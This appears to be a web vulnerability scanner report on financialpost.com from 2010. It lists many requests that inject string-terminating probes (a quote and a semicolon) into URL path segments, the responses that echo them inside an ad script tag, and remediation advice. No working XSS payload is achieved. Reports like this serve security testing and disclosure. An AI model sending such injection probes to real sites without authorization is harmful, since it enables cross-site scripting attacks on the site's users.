GET /entrepreneurf775e'%3b6b7ab346bbb/Strategy+comes+easy/3931965/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 81970 Expires: Sun, 19 Dec 2010 03:14:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurf775e';6b7ab346bbb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurf775e';6b7ab346bbb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=45520954?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6435'%3b4f2bbbc1920 was submitted in the REST URL parameter 3. This input was echoed as b6435';4f2bbbc1920 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Strategy+comes+easy/3931965b6435'%3b4f2bbbc1920/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 54006 Expires: Sun, 19 Dec 2010 03:14:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy-comes-easy/3931965b6435';4f2bbbc1920/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy-comes-easy;kw=3931965b6435';4f2bbbc1920;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=3973656 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645f3'%3b095502b1fd7 was submitted in the REST URL parameter 4. This input was echoed as 645f3';095502b1fd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Strategy+comes+easy/3931965/645f3'%3b095502b1fd7 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44013
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6640b'%3b10be691c8d7 was submitted in the REST URL parameter 1. This input was echoed as 6640b';10be691c8d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur6640b'%3b10be691c8d7/Virtual+training/3967328/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83218 Expires: Sun, 19 Dec 2010 03:14:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur6640b';10be691c8d7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur6640b';10be691c8d7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50079065?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb40f'%3b9d8ba420d75 was submitted in the REST URL parameter 3. This input was echoed as eb40f';9d8ba420d75 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Virtual+training/3967328eb40f'%3b9d8ba420d75/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 53895 Expires: Sun, 19 Dec 2010 03:14:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual-training/3967328eb40f';9d8ba420d75/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual-training;kw=3967328eb40f';9d8ba420d75;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68303724?" ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504a'%3b07f3b9742b1 was submitted in the REST URL parameter 4. This input was echoed as 7504a';07f3b9742b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Virtual+training/3967328/7504a'%3b07f3b9742b1 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44723
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d93'%3be0889b50b05 was submitted in the REST URL parameter 1. This input was echoed as 74d93';e0889b50b05 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur74d93'%3be0889b50b05/advice/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44241
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed228'%3b2c8aa648e62 was submitted in the REST URL parameter 2. This input was echoed as ed228';2c8aa648e62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/adviceed228'%3b2c8aa648e62/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43385
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2b'%3b12bcecac1dd was submitted in the REST URL parameter 1. This input was echoed as 83f2b';12bcecac1dd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur83f2b'%3b12bcecac1dd/killer+apps/3967312/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 75646 Expires: Sun, 19 Dec 2010 03:14:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur83f2b';12bcecac1dd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur83f2b';12bcecac1dd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30614803?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9123'%3bb2fb6e2f239 was submitted in the REST URL parameter 3. This input was echoed as f9123';b2fb6e2f239 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/killer+apps/3967312f9123'%3bb2fb6e2f239/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 53710 Expires: Sun, 19 Dec 2010 03:14:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer-apps/3967312f9123';b2fb6e2f239/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer-apps;kw=3967312f9123';b2fb6e2f239;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34256389?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1b1a'%3b6b59f0dfd4e was submitted in the REST URL parameter 4. This input was echoed as d1b1a';6b59f0dfd4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/killer+apps/3967312/d1b1a'%3b6b59f0dfd4e HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43793
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 774a7'%3b09a396780ea was submitted in the REST URL parameter 1. This input was echoed as 774a7';09a396780ea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive774a7'%3b09a396780ea/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43161
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d37d2'%3b1feea254f5a was submitted in the REST URL parameter 1. This input was echoed as d37d2';1feea254f5a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executived37d2'%3b1feea254f5a/Departures+2010/3987965/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 84441 Expires: Sun, 19 Dec 2010 03:11:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived37d2';1feea254f5a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived37d2';1feea254f5a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69285676?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14022'%3bbd82e3b5b53 was submitted in the REST URL parameter 3. This input was echoed as 14022';bd82e3b5b53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Departures+2010/398796514022'%3bbd82e3b5b53/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69246 Expires: Sun, 19 Dec 2010 03:12:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures-2010/398796514022';bd82e3b5b53/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures-2010;kw=398796514022';bd82e3b5b53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92756471?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55e80'%3b7249d7b80f9 was submitted in the REST URL parameter 4. This input was echoed as 55e80';7249d7b80f9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Departures+2010/3987965/55e80'%3b7249d7b80f9 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43809
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b9c'%3bbb1481860ca was submitted in the REST URL parameter 1. This input was echoed as 86b9c';bb1481860ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive86b9c'%3bbb1481860ca/Discover+your+true+competitive+advantage/3992781/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74233 Expires: Sun, 19 Dec 2010 03:12:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive86b9c';bb1481860ca/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive86b9c';bb1481860ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32248287?"> ...[SNIP]...
